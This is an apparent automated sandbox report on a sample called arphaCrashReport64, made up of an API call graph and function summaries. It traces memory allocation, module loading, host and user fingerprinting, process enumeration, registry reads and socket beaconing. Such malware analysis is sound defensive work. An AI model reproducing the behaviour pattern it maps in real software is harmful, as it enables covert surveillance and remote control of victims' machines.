40556->40560 40558 24b645829b0 40557->40558 40559 24b64582992 send 40557->40559 40558->40550 40559->40557 40559->40558 40560->40557 40560->40558 40561 24b64582950 send 40560->40561 40561->40560 40563 24b64581380 40562->40563 40564 24b6458138a 40563->40564 40565 24b645a2478 63 API calls 40563->40565 40564->40553 40566 24b645813af 40565->40566 40567 24b645813c9 VirtualAlloc 40566->40567 40568 24b645813bc 40566->40568 40569 24b645813f3 ctype 40567->40569 40568->40553 40570 24b64581409 VirtualFree 40569->40570 40570->40553 40572 24b64581f55 VirtualAlloc 40571->40572 40573 24b645a24b4 40571->40573 40572->40545 40573->40572 40575 24b645a33d8 63 API calls 4 library calls 40573->40575 40575->40572 40576 24b64290091 40577 24b64290099 40576->40577 40578 24b642900db NtAllocateVirtualMemory 40577->40578 40579 24b64290383 40578->40579 40581 24b6429012e 40578->40581 40580 24b642902cc LdrLoadDll 40580->40581 40581->40579 40581->40580 40582 24b6458ed81 40583 24b6458ed90 40582->40583 40592 24b64593290 40583->40592 40585 24b6458eda7 _recalloc 40586 24b6458edba GetLastInputInfo GetTickCount GetForegroundWindow 40585->40586 40587 24b6458ee15 40586->40587 40588 24b6458ee09 40586->40588 40590 24b6458ee2d 40587->40590 40605 24b64582750 71 API calls ctype 40587->40605 40604 24b64582f20 82 API calls 40588->40604 40595 24b6459329b 40592->40595 40593 24b64595728 malloc 62 API calls 40593->40595 40594 24b645932b4 40594->40585 40595->40593 40595->40594 40599 24b645932ba std::_Facet_Register 40595->40599 40606 24b645957e8 RtlDecodePointer 40595->40606 40597 24b6459330b 40608 24b64593854 62 API calls std::exception::operator= 40597->40608 40599->40597 40607 24b64593f8c 72 API calls _cinit 40599->40607 40600 24b6459331c 40609 24b6459581c RaiseException ctype 40600->40609 40603 24b64593332 40604->40587 40605->40590 40606->40595 40607->40597 40608->40600 40609->40603 40610 24b645943f8 40611 24b6459441e 40610->40611 40615 24b64594426 40611->40615 40616 24b6459445b 40611->40616 40618 24b645942a4 40611->40618 40613 24b645944a0 40614 24b645942a4 118 API calls 40613->40614 40613->40615 40614->40615 40616->40613 40616->40615 40617 24b645942a4 118 API calls 40616->40617 40617->40613 40619 24b64594333 40618->40619 40620 24b645942b6 40618->40620 40622 24b64594384 40619->40622 40628 24b64594337 40619->40628 40665 24b645983f4 HeapCreate 40620->40665 40624 24b64594389 40622->40624 40625 24b645943df 40622->40625 40631 24b6459537c __onexitinit 62 API calls 40624->40631 40649 24b645942bf 40625->40649 40684 24b64594ab0 64 API calls _freefls 40625->40684 40634 24b6459436e 40628->40634 40628->40649 40679 24b64599300 63 API calls free 40628->40679 40630 24b645942cb _RTC_Initialize 40642 24b645942db GetCommandLineA 40630->40642 40656 24b645942cf 40630->40656 40632 24b6459439d 40631->40632 40636 24b645943a9 FlsSetValue 40632->40636 40632->40649 40633 24b64594364 40680 24b645947f4 65 API calls free 40633->40680 40634->40649 40682 24b645947f4 65 API calls free 40634->40682 40639 24b645943d5 40636->40639 40640 24b645943bf 40636->40640 40683 24b64593d28 62 API calls 2 library calls 40639->40683 40643 24b6459481c _getptd 62 API calls 40640->40643 40641 24b64594369 40681 24b6459844c HeapDestroy 40641->40681 40672 24b6459976c 67 API calls 2 library calls 40642->40672 40647 24b645943c6 GetCurrentThreadId 40643->40647 40647->40649 40648 24b645942ed 40673 24b6459902c 69 API calls __onexitinit 40648->40673 40649->40616 40651 24b645942f9 40652 24b64594304 40651->40652 40653 24b645942fd 40651->40653 40675 24b64599674 77 API calls 2 library calls 40652->40675 40674 24b645947f4 65 API calls free 40653->40674 40671 24b6459844c HeapDestroy 40656->40671 40657 24b64594309 40658 24b6459431d 40657->40658 40676 24b64599374 76 API calls 5 library calls 40657->40676 40664 24b64594321 40658->40664 40678 24b64599300 63 API calls free 40658->40678 40661 24b64594312 40661->40658 40677 24b64595078 73 API calls 2 library calls 40661->40677 40662 24b64594331 40662->40653 40664->40649 40666 24b645942bb 40665->40666 40667 24b6459841c GetVersion 40665->40667 40666->40649 40670 24b64594af0 70 API calls 2 library calls 40666->40670 40668 24b64598426 HeapSetInformation 40667->40668 40669 24b64598440 40667->40669 40668->40669 40669->40666 40670->40630 40671->40649 40672->40648 40673->40651 40674->40656 40675->40657 40676->40661 40677->40658 40678->40662 40679->40633 40680->40641 40681->40634 40682->40649 40683->40649 40684->40649 40685 24b64584530 GetModuleHandleA GetProcAddress 40686 24b645847a8 40685->40686 40687 24b6458457f LoadLibraryA GetProcAddress 40685->40687 40688 24b64592c00 _cftof_l 8 API calls 40686->40688 40689 24b645845ed 40687->40689 40690 24b645845c1 VirtualProtect VirtualProtect 40687->40690 40691 24b645847c8 40688->40691 40711 24b645921d0 40689->40711 40690->40689 40696 24b64584646 40733 24b645930bc 40696->40733 40697 24b64584621 40698 24b645930bc 64 API calls 40697->40698 40700 24b6458463d CloseHandle 40698->40700 40700->40696 40702 24b645923a0 81 API calls 40703 24b64584677 40702->40703 40704 24b64584687 40703->40704 40705 24b645923a0 81 API calls 40703->40705 40751 24b64583db0 40704->40751 40705->40704 40707 24b645846d0 CreateThread WaitForSingleObject CloseHandle 40708 24b645921d0 24 API calls 40707->40708 40710 24b645846a3 ctype 40708->40710 40709 24b645931b0 73 API calls 40709->40710 40710->40686 40710->40707 40710->40709 40712 24b64592202 _recalloc 40711->40712 40713 24b64592219 GetComputerNameA 40712->40713 40714 24b64592235 lstrcpy 40713->40714 40715 24b64592247 _recalloc 40713->40715 40714->40715 40716 24b6459225c wsprintfA 40715->40716 40756 24b645814c0 40716->40756 40719 24b64592c00 _cftof_l 8 API calls 40720 24b645845f9 lstrcpy 40719->40720 40721 24b645923a0 40720->40721 40774 24b645982c0 40721->40774 40724 24b64592409 lstrcpy 40725 24b6459241b _recalloc 40724->40725 40726 24b64592430 wsprintfA 40725->40726 40727 24b645814c0 21 API calls 40726->40727 40728 24b6459246d 40727->40728 40729 24b6459247b 40728->40729 40776 24b64594298 65 API calls __tzset 40728->40776 40731 24b64592c00 _cftof_l 8 API calls 40729->40731 40732 24b64584615 40731->40732 40732->40696 40732->40697 40734 24b645930e7 40733->40734 40735 24b645930fc 40733->40735 40736 24b64593200 _errno 62 API calls 40734->40736 40739 24b6459537c __onexitinit 62 API calls 40735->40739 40737 24b645930ec 40736->40737 40782 24b64595708 40737->40782 40741 24b64593110 40739->40741 40740 24b64584662 CloseHandle 40740->40702 40742 24b64593180 40741->40742 40777 24b64594958 40741->40777 40785 24b64593d28 62 API calls 2 library calls 40742->40785 40746 24b64593188 40746->40740 40786 24b64593240 62 API calls 2 library calls 40746->40786 40747 24b6459481c _getptd 62 API calls 40749 24b6459312c CreateThread 40747->40749 40749->40740 40750 24b64593178 GetLastError 40749->40750 40750->40742 40752 24b645921d0 24 API calls 40751->40752 40753 24b64583dce 40752->40753 40754 24b645931b0 73 API calls 40753->40754 40755 24b64583df2 ctype 40753->40755 40754->40755 40755->40710 40757 24b64581515 _recalloc 40756->40757 40758 24b6458153f 7 API calls 40757->40758 40759 24b645815dc 40758->40759 40768 24b645815d4 40758->40768 40760 24b64581730 RegQueryValueExA 40759->40760 40761 24b645815f1 40759->40761 40759->40768 40764 24b64581603 __wtomb_environ 40760->40764 40760->40768 40762 24b645816e8 40761->40762 40763 24b645815fa 40761->40763 40762->40768 40769 24b64581719 wsprintfA 40762->40769 40763->40764 40765 24b64581697 RegQueryValueExA 40763->40765 40766 24b6458176e lstrcpy 40764->40766 40764->40768 40767 24b645816ce wsprintfA 40765->40767 40765->40768 40766->40768 40767->40768 40770 24b64581793 FreeLibrary 40768->40770 40771 24b6458179c 40768->40771 40769->40768 40770->40771 40772 24b64592c00 _cftof_l 8 API calls 40771->40772 40773 24b645817ae 40772->40773 40773->40719 40775 24b645923ed GetComputerNameA 40774->40775 40775->40724 40775->40725 40776->40729 40778 24b645948d4 _getptd 62 API calls 40777->40778 40779 24b64594963 40778->40779 40780 24b6459311d 40779->40780 40787 24b645952d4 62 API calls 2 library calls 40779->40787 40780->40747 40788 24b64595698 RtlDecodePointer 40782->40788 40785->40746 40786->40740 40789 24b645956d6 40788->40789 40790 24b645956f7 40788->40790 40789->40740 40795 24b64595664 16 API calls _fltout2 40790->40795 40796 24b64584430 40797 24b645982c0 _recalloc 40796->40797 40798 24b64584450 RegisterClassExA 40797->40798 40799 24b6458448c GetModuleHandleA CreateWindowExA 40798->40799 40800 24b64584481 40798->40800 40799->40800 40801 24b645844db GetMessageA 40799->40801 40802 24b64584524 40801->40802 40803 24b645844f2 40801->40803 40803->40802 40804 24b645844f7 TranslateMessage DispatchMessageA GetMessageA 40803->40804 40804->40802 40804->40803 40805 24b645812b0 40806 24b645812c6 40805->40806 40807 24b645812be 40805->40807 40808 24b645a2478 63 API calls 40806->40808 40809 24b645812ed VirtualAlloc 40808->40809 40810 24b64581315 ctype 40809->40810 40811 24b64581334 VirtualFree 40810->40811 40812 24b64581342 40810->40812 40811->40812 40813 24b64583a90 40814 24b64583aac __initmbctable 40813->40814 40841 24b645819a0 WSAStartup CreateEventA 40814->40841 40817 24b64583d55 40908 24b64581ac0 11 API calls 40817->40908 40819 24b64583d5f 40820 24b64592c00 _cftof_l 8 API calls 40819->40820 40822 24b64583d70 40820->40822 40823 24b64583b04 40823->40817 40824 24b64583b46 Sleep 40823->40824 40825 24b64583b57 GetTickCount64 40823->40825 40845 24b64581bf0 ResetEvent timeGetTime socket 40823->40845 40829 24b64583bea 40824->40829 40859 24b6458e4a0 65 API calls 2 library calls 40825->40859 40831 24b645819a0 10 API calls 40829->40831 40837 24b64583c26 Sleep 40829->40837 40838 24b64583c01 TerminateThread WaitForSingleObject CloseHandle 40829->40838 40839 24b64583d10 CloseHandle 40829->40839 40840 24b64583c44 CloseHandle 40829->40840 40907 24b64581ac0 11 API calls 40829->40907 40830 24b64583b79 40830->40829 40832 24b64583c64 WaitForSingleObject Sleep WaitForSingleObject WaitForSingleObject Sleep 40830->40832 40836 24b64583b93 setsockopt CancelIo closesocket SetEvent 40830->40836 40860 24b64583560 40830->40860 40833 24b64583d3f GetTickCount64 40831->40833 40834 24b64583cc8 TerminateThread WaitForSingleObject CloseHandle 40832->40834 40835 24b64583ced Sleep 40832->40835 40833->40817 40833->40823 40834->40835 40835->40829 40836->40829 40837->40829 40838->40837 40839->40829 40839->40839 40840->40829 40840->40840 40842 24b64581a63 _recalloc 40841->40842 40843 24b64592c00 _cftof_l 8 API calls 40842->40843 40844 24b64581a76 GetTickCount64 40843->40844 40844->40817 40844->40823 40846 24b64581c7d gethostbyname 40845->40846 40857 24b64581c76 40845->40857 40847 24b64581c8e htons connect 40846->40847 40846->40857 40849 24b64581cc6 getsockname 40847->40849 40847->40857 40848 24b64592c00 _cftof_l 8 API calls 40850 24b64581e65 40848->40850 40851 24b645982c0 _recalloc 40849->40851 40850->40823 40852 24b64581cfd inet_ntop setsockopt setsockopt setsockopt setsockopt 40851->40852 40853 24b64581db7 WSAIoctl 40852->40853 40854 24b64581dfe 40852->40854 40853->40854 40855 24b645930bc 64 API calls 40854->40855 40856 24b64581e29 40855->40856 40856->40857 40858 24b645930bc 64 API calls 40856->40858 40857->40848 40858->40857 40859->40830 40861 24b645835ab _recalloc 40860->40861 40909 24b64583430 40861->40909 40864 24b645921d0 24 API calls 40865 24b645835e0 40864->40865 40866 24b64583607 40865->40866 40867 24b645835fa GetComputerNameA 40865->40867 40868 24b64583612 GetCurrentProcessId LoadLibraryA GetProcAddress GetUserNameA 40866->40868 40867->40868 40917 24b64583160 6 API calls 40868->40917 40872 24b645836fd CreateToolhelp32Snapshot 40873 24b64593290 std::_Facet_Register 73 API calls 40872->40873 40874 24b64583716 40873->40874 40875 24b6458372b 40874->40875 40927 24b64583080 Process32First 40874->40927 40934 24b64593c68 62 API calls 2 library calls 40875->40934 40878 24b64583751 40879 24b645921d0 24 API calls 40878->40879 40880 24b6458375d lstrlen 40879->40880 40881 24b645837c7 40880->40881 40882 24b6458376d 40880->40882 40938 24b64593c68 62 API calls 2 library calls 40881->40938 40935 24b645938a4 GetSystemTimeAsFileTime 40882->40935 40885 24b64583777 40936 24b64593c20 76 API calls 2 library calls 40885->40936 40886 24b645837dd 40888 24b645921d0 24 API calls 40886->40888 40890 24b645837e9 40888->40890 40889 24b64583781 wsprintfA 40937 24b645920e0 21 API calls 2 library calls 40889->40937 40892 24b645837fc 40890->40892 40893 24b64583821 40890->40893 40895 24b645921d0 24 API calls 40892->40895 40940 24b645832f0 12 API calls _cftof_l 40893->40940 40897 24b64583808 40895->40897 40896 24b6458382d GetModuleFileNameA 40898 24b645923a0 81 API calls 40896->40898 40939 24b64593c68 62 API calls 2 library calls 40897->40939 40900 24b6458384e 40898->40900 40901 24b645923a0 81 API calls 40900->40901 40902 24b64583863 40901->40902 40941 24b64582750 71 API calls ctype 40902->40941 40904 24b645838a8 40905 24b64592c00 _cftof_l 8 API calls 40904->40905 40906 24b645838cd 40905->40906 40906->40830 40907->40829 40908->40819 40910 24b645982c0 _recalloc 40909->40910 40911 24b6458346a GetCurrentHwProfileA 40910->40911 40942 24b64593550 40911->40942 40914 24b645834d2 ctype 40915 24b64592c00 _cftof_l 8 API calls 40914->40915 40916 24b6458354d lstrcat 40915->40916 40916->40864 40918 24b6458329b 40917->40918 40919 24b64592c00 _cftof_l 8 API calls 40918->40919 40920 24b645832ca 40919->40920 40921 24b6458d960 40920->40921 40926 24b6458d97d 40921->40926 40923 24b6458d9e9 40925 24b6458da02 ctype 40923->40925 40945 24b6458d750 73 API calls 3 library calls 40923->40945 40925->40872 40926->40923 40944 24b6459fa0c 63 API calls 2 library calls 40926->40944 40928 24b64583141 FindCloseChangeNotification 40927->40928 40930 24b645830ae 40927->40930 40932 24b64583118 Process32Next 40930->40932 40946 24b645934ec 40930->40946 40953 24b64584a30 73 API calls ctype 40930->40953 40932->40930 40933 24b64583128 40932->40933 40933->40928 40934->40878 40935->40885 40936->40889 40937->40881 40938->40886 40939->40893 40940->40896 40941->40904 40943 24b64583488 GetComputerNameA 40942->40943 40943->40914 40944->40923 40945->40925 40947 24b6459351d 40946->40947 40948 24b645934f9 40946->40948 40948->40947 40949 24b64593200 _errno 62 API calls 40948->40949 40950 24b64593503 40949->40950 40951 24b64595708 _invalid_parameter_noinfo 17 API calls 40950->40951 40952 24b6459350e 40951->40952 40952->40930 40953->40930 40954 7ff6e2d5e8b0 40975 7ff6e2d5ddc0 40954->40975 40957 7ff6e2d5e9fc 41001 7ff6e2d5ed0c 7 API calls __scrt_fastfail 40957->41001 40958 7ff6e2d5e8cc 40960 7ff6e2d5ea06 40958->40960 40967 7ff6e2d5e8ea __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 40958->40967 41002 7ff6e2d5ed0c 7 API calls __scrt_fastfail 40960->41002 40962 7ff6e2d5e90f 40963 7ff6e2d5ea11 __CxxCallCatchBlock 40964 7ff6e2d5e995 40983 7ff6e2d5ee58 40964->40983 40966 7ff6e2d5e99a 40986 7ff6e2d56790 CoInitialize InitCommonControlsEx 40966->40986 40967->40962 40967->40964 40998 7ff6e2d65948 34 API calls __InternalCxxFrameHandler 40967->40998 40970 7ff6e2d5e9b6 40999 7ff6e2d5eea0 GetModuleHandleW 40970->40999 40972 7ff6e2d5e9bd 40972->40963 41000 7ff6e2d5dfa4 8 API calls 2 library calls 40972->41000 40974 7ff6e2d5e9d4 40974->40962 40976 7ff6e2d5dde2 __scrt_initialize_crt 40975->40976 41003 7ff6e2d604a4 40976->41003 40979 7ff6e2d5ddeb 40979->40957 40979->40958 41052 7ff6e2d5fcc0 40983->41052 40985 7ff6e2d5ee6f GetStartupInfoW 40985->40966 41054 7ff6e2d52db0 40986->41054 40990 7ff6e2d567e7 EnterCriticalSection 40991 7ff6e2d56806 40990->40991 40995 7ff6e2d5681f __vcrt_getptd_noexit 40990->40995 40992 7ff6e2d5680c DestroyWindow 40991->40992 40991->40995 40992->40995 40993 7ff6e2d5684c LeaveCriticalSection 40994 7ff6e2d56869 __vcrt_getptd_noexit 40993->40994 41126 7ff6e2d55a50 RaiseException DeleteCriticalSection 40994->41126 40995->40993 40997 7ff6e2d568a7 CoUninitialize 40997->40970 40998->40964 40999->40972 41000->40974 41001->40960 41002->40963 41004 7ff6e2d604ad __vcrt_initialize_winapi_thunks __vcrt_initialize 41003->41004 41016 7ff6e2d61ccc 41004->41016 41007 7ff6e2d5dde7 41007->40979 41011 7ff6e2d664d0 41007->41011 41009 7ff6e2d604c4 41009->41007 41023 7ff6e2d61d14 DeleteCriticalSection 41009->41023 41012 7ff6e2d6a680 41011->41012 41013 7ff6e2d5ddf4 41012->41013 41040 7ff6e2d68c8c 41012->41040 41013->40979 41015 7ff6e2d604d8 8 API calls 3 library calls 41013->41015 41015->40979 41017 7ff6e2d61cd4 41016->41017 41019 7ff6e2d61d05 41017->41019 41020 7ff6e2d604b7 41017->41020 41024 7ff6e2d62050 41017->41024 41029 7ff6e2d61d14 DeleteCriticalSection 41019->41029 41020->41007 41022 7ff6e2d60628 8 API calls 3 library calls 41020->41022 41022->41009 41023->41007 41030 7ff6e2d61d4c 41024->41030 41027 7ff6e2d6209b InitializeCriticalSectionAndSpinCount 41028 7ff6e2d62090 41027->41028 41028->41017 41029->41020 41031 7ff6e2d61dad 41030->41031 41038 7ff6e2d61da8 try_get_function 41030->41038 41031->41027 41031->41028 41032 7ff6e2d61e90 41032->41031 41034 7ff6e2d61e9e GetProcAddress 41032->41034 41033 7ff6e2d61ddc LoadLibraryExW 41035 7ff6e2d61dfd GetLastError 41033->41035 41033->41038 41036 7ff6e2d61eaf 41034->41036 41035->41038 41036->41031 41037 7ff6e2d61e75 FreeLibrary 41037->41038 41038->41031 41038->41032 41038->41033 41038->41037 41039 7ff6e2d61e37 LoadLibraryExW 41038->41039 41039->41038 41051 7ff6e2d68e40 EnterCriticalSection 41040->41051 41042 7ff6e2d68c9c 41043 7ff6e2d6ade4 32 API calls 41042->41043 41044 7ff6e2d68ca5 41043->41044 41046 7ff6e2d68a90 34 API calls 41044->41046 41050 7ff6e2d68cb3 41044->41050 41045 7ff6e2d68e94 _onexit LeaveCriticalSection 41047 7ff6e2d68cbf 41045->41047 41048 7ff6e2d68cae 41046->41048 41047->41012 41049 7ff6e2d68b80 GetStdHandle GetFileType 41048->41049 41049->41050 41050->41045 41053 7ff6e2d5fca0 41052->41053 41053->40985 41053->41053 41055 7ff6e2d52dd5 41054->41055 41056 7ff6e2d52ddf GetCurrentThreadId 41055->41056 41058 7ff6e2d52df6 GetCommandLineW 41055->41058 41127 7ff6e2d5dd40 4 API calls 2 library calls 41056->41127 41059 7ff6e2d54fe0 CommandLineToArgvW 41058->41059 41060 7ff6e2d55045 __scrt_fastfail 41059->41060 41061 7ff6e2d55059 SetWindowLocalDump 41060->41061 41062 7ff6e2d55068 SetWindowLocalDump 41061->41062 41064 7ff6e2d550a3 41062->41064 41065 7ff6e2d550fe SetWindowLocalDump 41064->41065 41066 7ff6e2d550e3 SetWindowLocalDump 41064->41066 41068 7ff6e2d55115 41065->41068 41067 7ff6e2d550f7 41066->41067 41138 7ff6e2d5e3e0 8 API calls 2 library calls 41067->41138 41068->41067 41069 7ff6e2d55119 LocalFree SetWindowLocalDump 41068->41069 41072 7ff6e2d55131 __scrt_fastfail 41069->41072 41071 7ff6e2d555e8 41071->40990 41072->41067 41073 7ff6e2d55165 SetWindowLocalDump 41072->41073 41074 7ff6e2d55198 41072->41074 41075 7ff6e2d55153 SetWindowLocalDump 41072->41075 41076 7ff6e2d55182 SetWindowLocalDump 41073->41076 41077 7ff6e2d5519d SetWindowLocalDump 41074->41077 41078 7ff6e2d551e8 EnterCriticalSection GetCurrentThreadId 41074->41078 41075->41073 41076->41067 41079 7ff6e2d551af SetWindowLocalDump 41077->41079 41086 7ff6e2d5523f 41078->41086 41081 7ff6e2d551cc SetWindowLocalDump 41079->41081 41080 7ff6e2d55292 LeaveCriticalSection SetWindowLocalDump 41082 7ff6e2d552ab 41080->41082 41083 7ff6e2d551e6 41081->41083 41128 7ff6e2d51430 44 API calls 2 library calls 41082->41128 41083->41076 41085 7ff6e2d552b3 41087 7ff6e2d55605 41085->41087 41088 7ff6e2d552bf 41085->41088 41086->41080 41139 7ff6e2d52750 RtlPcToFileHeader RaiseException _CxxThrowException 41087->41139 41091 7ff6e2d552ff 41088->41091 41092 7ff6e2d552f2 41088->41092 41093 7ff6e2d552e3 41088->41093 41130 7ff6e2d55610 33 API calls 3 library calls 41091->41130 41092->41091 41129 7ff6e2d52f40 41 API calls wmemcpy_s 41093->41129 41096 7ff6e2d552f0 41131 7ff6e2d56ff0 67 API calls 3 library calls 41096->41131 41098 7ff6e2d55327 41132 7ff6e2d5a4e0 46 API calls 41098->41132 41100 7ff6e2d5534d 41101 7ff6e2d55370 41100->41101 41133 7ff6e2d5d894 25 API calls 41100->41133 41134 7ff6e2d5d9c4 12 API calls 41101->41134 41104 7ff6e2d5535c 41104->41101 41108 7ff6e2d55365 SetLastError 41104->41108 41105 7ff6e2d5537d GetCurrentThreadId EnterCriticalSection LeaveCriticalSection CreateDialogParamW 41106 7ff6e2d55444 41105->41106 41107 7ff6e2d553e4 SetWindowLocalDump 41105->41107 41135 7ff6e2d5ae50 177 API calls 3 library calls 41106->41135 41110 7ff6e2d553f6 SetWindowLocalDump 41107->41110 41108->41107 41112 7ff6e2d55413 SetWindowLocalDump 41110->41112 41111 7ff6e2d5543c 41137 7ff6e2d51920 44 API calls 2 library calls 41111->41137 41116 7ff6e2d5542d SetWindowLocalDump 41112->41116 41114 7ff6e2d554a4 GetMessageW 41121 7ff6e2d55453 41114->41121 41115 7ff6e2d55470 PeekMessageW 41115->41114 41115->41121 41116->41111 41117 7ff6e2d5552e 41136 7ff6e2d5ac60 38 API calls 41117->41136 41119 7ff6e2d555ae __vcrt_getptd_noexit 41119->41067 41121->41111 41121->41114 41121->41115 41121->41117 41122 7ff6e2d554d5 TranslateMessage DispatchMessageW 41121->41122 41122->41121 41126->40997 41127->41058 41128->41085 41129->41096 41130->41096 41131->41098 41132->41100 41133->41104 41134->41105 41135->41121 41137->41119 41138->41071

                                            Executed Functions

                                            Function 00007FF6E2D54FE0 Relevance: 65.1, APIs: 35, Strings: 2, Instructions: 398threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 15 7ff6e2d54fe0-7ff6e2d55062 CommandLineToArgvW call 7ff6e2d5fcc0 * 2 SetWindowLocalDump 20 7ff6e2d55068-7ff6e2d550d7 SetWindowLocalDump 15->20 24 7ff6e2d550d9-7ff6e2d550e1 20->24 25 7ff6e2d550fe-7ff6e2d55117 SetWindowLocalDump 20->25 24->25 26 7ff6e2d550e3-7ff6e2d550f1 SetWindowLocalDump 24->26 27 7ff6e2d550f7-7ff6e2d550f9 25->27 30 7ff6e2d55119-7ff6e2d55136 LocalFree SetWindowLocalDump 25->30 26->27 29 7ff6e2d555d9-7ff6e2d55604 call 7ff6e2d5e3e0 27->29 30->27 34 7ff6e2d55138-7ff6e2d5514c call 7ff6e2d5fcc0 30->34 37 7ff6e2d55165-7ff6e2d55178 SetWindowLocalDump 34->37 38 7ff6e2d5514e-7ff6e2d55151 34->38 41 7ff6e2d55182-7ff6e2d55193 SetWindowLocalDump 37->41 39 7ff6e2d55198-7ff6e2d5519b 38->39 40 7ff6e2d55153-7ff6e2d5515c SetWindowLocalDump 38->40 42 7ff6e2d5519d-7ff6e2d551e6 SetWindowLocalDump * 3 39->42 43 7ff6e2d551e8-7ff6e2d55242 EnterCriticalSection GetCurrentThreadId call 7ff6e2d62578 39->43 40->37 41->29 42->41 48 7ff6e2d55292-7ff6e2d552b9 LeaveCriticalSection SetWindowLocalDump call 7ff6e2d51430 43->48 49 7ff6e2d55244-7ff6e2d55261 call 7ff6e2d62578 43->49 60 7ff6e2d55605-7ff6e2d5560f call 7ff6e2d52750 48->60 61 7ff6e2d552bf-7ff6e2d552d8 48->61 49->48 55 7ff6e2d55263-7ff6e2d55275 49->55 58 7ff6e2d55277-7ff6e2d5527a 55->58 59 7ff6e2d5527e-7ff6e2d55285 55->59 58->59 62 7ff6e2d55287-7ff6e2d5528c 59->62 63 7ff6e2d5528f 59->63 67 7ff6e2d552da-7ff6e2d552e1 61->67 68 7ff6e2d55301 61->68 62->63 63->48 69 7ff6e2d552f2 67->69 70 7ff6e2d552e3-7ff6e2d552f0 call 7ff6e2d52f40 67->70 71 7ff6e2d55304-7ff6e2d55314 call 7ff6e2d55610 68->71 73 7ff6e2d552f5-7ff6e2d552fd 69->73 78 7ff6e2d55315-7ff6e2d55339 call 7ff6e2d56f50 call 7ff6e2d56ff0 70->78 71->78 73->73 76 7ff6e2d552ff 73->76 76->71 83 7ff6e2d5533b-7ff6e2d5533e 78->83 84 7ff6e2d55344-7ff6e2d55355 call 7ff6e2d5a4e0 78->84 83->84 87 7ff6e2d55357-7ff6e2d55363 call 7ff6e2d5d894 84->87 88 7ff6e2d55370-7ff6e2d553e2 call 7ff6e2d5d9c4 GetCurrentThreadId EnterCriticalSection LeaveCriticalSection CreateDialogParamW 84->88 87->88 95 7ff6e2d55365-7ff6e2d5536e SetLastError 87->95 93 7ff6e2d55444-7ff6e2d55455 call 7ff6e2d5ae50 88->93 94 7ff6e2d553e4-7ff6e2d5543f SetWindowLocalDump * 4 88->94 99 7ff6e2d55457-7ff6e2d5545a 93->99 100 7ff6e2d5545f-7ff6e2d55464 93->100 102 7ff6e2d555a5-7ff6e2d555b7 call 7ff6e2d51920 94->102 95->94 99->102 103 7ff6e2d55467-7ff6e2d55469 100->103 114 7ff6e2d555b9-7ff6e2d555be call 7ff6e2d62484 102->114 115 7ff6e2d555c3-7ff6e2d555d0 102->115 105 7ff6e2d5546b 103->105 106 7ff6e2d554a4-7ff6e2d554ba GetMessageW 103->106 107 7ff6e2d55470-7ff6e2d5548a PeekMessageW 105->107 106->103 109 7ff6e2d554bc-7ff6e2d554be 106->109 107->106 111 7ff6e2d5548c-7ff6e2d5549f 107->111 112 7ff6e2d5552e-7ff6e2d555a4 call 7ff6e2d5ac60 SetWindowLocalDump EnterCriticalSection GetCurrentThreadId call 7ff6e2d54eb0 LeaveCriticalSection SetWindowLocalDump 109->112 113 7ff6e2d554c0-7ff6e2d554d3 109->113 111->107 126 7ff6e2d554a1 111->126 112->102 127 7ff6e2d554eb-7ff6e2d554f1 113->127 128 7ff6e2d554d5-7ff6e2d554e5 TranslateMessage DispatchMessageW 113->128 114->115 116 7ff6e2d555d7 115->116 117 7ff6e2d555d2 call 7ff6e2d62484 115->117 116->29 117->116 126->106 130 7ff6e2d5551c-7ff6e2d55529 127->130 131 7ff6e2d554f3-7ff6e2d554f8 127->131 128->127 130->103 131->130 133 7ff6e2d554fa-7ff6e2d554fd 131->133 133->130 135 7ff6e2d554ff-7ff6e2d55504 133->135 135->130 136 7ff6e2d55506-7ff6e2d55517 135->136 136->103
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904633402.00007FF6E2D51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6E2D50000, based on PE: true
                                            • Associated: 00000002.00000002.2904616051.00007FF6E2D50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000002.00000002.2904656659.00007FF6E2D72000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000002.00000002.2904680982.00007FF6E2D82000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000002.00000002.2904701121.00007FF6E2D85000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ff6e2d50000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Local$DumpWindow$CriticalSection$ArgvCommandCurrentEnterExceptionFreeLeaveLineThreadThrow
                                            • String ID: arpha_winlocaldumpdir$arpha_winlocaldumpexe
                                            • API String ID: 1478015506-3845740607
                                            • Opcode ID: 9b7d2a6452f4294c9ae12609badc9aeb7a3720a96c2b1d471fa69ec30be05c9f
                                            • Instruction ID: ba4a8592184ceb4a4ed2c781abfa426a84c1dbd62f5f25fc1b3d79a6b8c3e68a
                                            • Opcode Fuzzy Hash: 9b7d2a6452f4294c9ae12609badc9aeb7a3720a96c2b1d471fa69ec30be05c9f
                                            • Instruction Fuzzy Hash: DF025D27E18A82C6EB149F65D8483AD33A2FB84B88F444235DB4E837A4DFBED444C715
                                            Function 0000024B645814C0 Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 174libraryloaderregistryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: AddressProc$Library$FreeLoadOpenlstrcpy
                                            • String ID: %08X$ADVAPI32.dll$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA
                                            • API String ID: 73907543-2913591164
                                            • Opcode ID: 365d0e112e7cdaa6982ef6da38e7ea94118737f30474664e1cd6f0c1e0a991be
                                            • Instruction ID: 27787d73311d9d0545e8ef4b469d6679424cd63cf00697eff314d2e3d4617479
